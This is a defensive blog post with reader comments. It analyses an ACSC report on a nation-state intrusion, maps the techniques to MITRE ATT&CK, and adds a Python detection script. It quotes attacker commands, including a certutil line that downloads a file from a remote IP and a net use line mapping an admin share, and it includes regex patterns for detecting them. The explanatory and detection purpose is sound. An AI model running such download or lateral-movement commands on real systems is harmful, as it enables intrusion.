Analyzing the ACSC Report on Australian Attack

Great write-up by the ACSC. It was very enlightening to see an actual attack evolve and get analysed using the MITRE ATT&CK framework, which lets us visualize the attack end to end.

When the news first came out yesterday, I thought it was a DDoS-style campaign, but as I read through this excellent analysis by the ACSC, I realized how much bigger this really was.

I took the liberty of mapping the techniques seen during this attack onto the ATT&CK framework. There are definitely some interesting observations, especially related to the use of common public exploits and living off the land.

MITRE ATT&CK mapping of attack vectors
  • Nation-state actors targeting another nation state using public exploits and not dropping zero-days by the hour? That’s one myth busted again.
  • Nation-state actors using boring techniques like credential harvesting to move laterally and remain undetected? That can’t be right. Right?
  • When CVE-2019-18935 came out, it made a lot of noise last year, especially since Telerik UI is widely used in web applications. The same is true of CVE-2019-19781: easy exploitation of unpatched, vulnerable Citrix servers made a lot of noise when this CVE was discovered, but I guess patching is not exciting.
  • It’s 2020 and the best way to manage passwords is storing them in clear text in Excel files. Right? Attackers found clear-text passwords in password spreadsheets as well as passwords stored in emails.
  • How many times have attackers moved laterally using SMB traffic, e.g. net use x: \\hostname\c$? Oh, the dangers of a flat network. Network segmentation FTW!
  • Using remote file copy for lateral movement, a.k.a. certutil.exe -urlcache -split -f https://192.0.2.1:443/x.php c:\x.txt? That was something interesting.
  • Exfiltration using alternate protocols and existing C2 channels. Ensuring visibility of outgoing network traffic and proxying it should help here.
  • ACSC recommends patching, MFA, event logging and monitoring for defending against nation-state actors. They can’t be serious. There’s no machine learning there. Right? It’s that mundane, boring stuff that actually protects best.
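The two command lines quoted above (certutil downloading a file, net use mapping an admin share) are exactly what process-creation logging can catch. The following is an added example, not code from the ACSC report or this article; the event lines, their host|user|image|command line layout, and the rule names are constructed assumptions.

```python
import re

# Constructed sample process-creation events (not taken from the ACSC report).
# One event per line: host|user|image|command line, roughly the fields that
# Sysmon Event ID 1 or Windows Security 4688 (with command-line auditing) carry.
SAMPLE_EVENTS = """\
WS01|CORP\\alice|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f https://192.0.2.1:443/x.php c:\\x.txt
WS01|CORP\\alice|C:\\Windows\\System32\\net.exe|net use x: \\\\FS02\\c$
SRV03|CORP\\svc_backup|C:\\Windows\\System32\\net.exe|net use z: \\\\FS02\\shared
WS07|CORP\\bob|C:\\Windows\\System32\\certutil.exe|certutil.exe -verify signed.cer
"""

# certutil fetching content from a URL: the LOLBin download seen in the report
# (ATT&CK T1105, Ingress Tool Transfer, formerly "Remote File Copy").
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.IGNORECASE)

# net use mapping a hidden administrative share such as \\host\c$ or \\host\admin$
# (ATT&CK T1021.002, SMB/Windows Admin Shares). Ordinary shares are not flagged.
ADMIN_SHARE_MAP = re.compile(
    r"\bnet(\.exe)?\s+use\b.*\\\\[^\\\s]+\\(c\$|admin\$|[a-z]\$)", re.IGNORECASE
)

RULES = [
    ("certutil remote file download", "T1105", CERTUTIL_DOWNLOAD),
    ("admin share mapping via net use", "T1021.002", ADMIN_SHARE_MAP),
]


def detect(events: str) -> list[dict]:
    """Run the two rules over pipe-delimited events; return one finding per rule hit."""
    findings = []
    for lineno, line in enumerate(events.splitlines(), 1):
        if not line.strip():
            continue
        host, user, image, cmdline = line.split("|", 3)
        for name, technique, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(
                    {"line": lineno, "host": host, "user": user,
                     "rule": name, "technique": technique, "cmdline": cmdline}
                )
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"line {f['line']} {f['host']} {f['user']}: {f['rule']} ({f['technique']})")
```

Both rules fire only on the first two constructed events; the normal share mapping and the legitimate certutil -verify call are left alone, which is the kind of baseline tuning the ACSC's logging recommendation implies.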

Hats off to the ACSC for being able to analyze the TTPs in such depth so early. There are great lessons here. How many enterprises, when faced with such a determined adversary, can protect themselves? Very few, I guess. Many of the shortcomings listed here, such as not patching or being susceptible to spear phishing, are extremely common everywhere. All it takes is one determined attacker.

We need to go back to basics. The CIS Top 20 Controls have gone through many iterations, but one thing has not changed since the very beginning: the top two controls are asset inventory of all hardware and software. Almost every other security control depends upon them. If we are incapable of implementing these two controls well, everything else (irrespective of the "next gen" tag) will be suboptimal.

Implementing MFA is another game changer, especially considering that authentication and authorization look very different in the modern cloud era. Even the most basic MFA can greatly reduce the attack surface.


Surendra S.

Cyber Security Strategist | Thought Leadership | Applied Crypto Expert | Chevening Cyber Fellow | Advisor & Mentor

4 years
Cdr Praveen Kumar

Information Technology, Cyber Security Transformation Evangelist | Ex- Indian Navy

4 years

Sir, could you share the link to the ACSC report? Unable to find it.
Asif Hameed Khan

Cybersecurity Professional | OT and IoT

4 years

Informative
Avinash Sinha

10 K Followers | Cyber Security Leader - SANS GICSP | CISO | HIPAA | Azure | Cloud PT | AWS | Industry 4.0 | Views Expressed are my own | Artificial Intelligence

4 years

Cdr Sanjeev Singh (Retd) Nice article. The mapping is really small to read. Could you please share it in Excel or via Drive?
Harsha Vardhan Jonnalagadda

Cyber Security Professional

4 years

The report by ACSC is really very detailed and well investigated and documented. It was a pleasure to read that followed by your insights. Thanks.
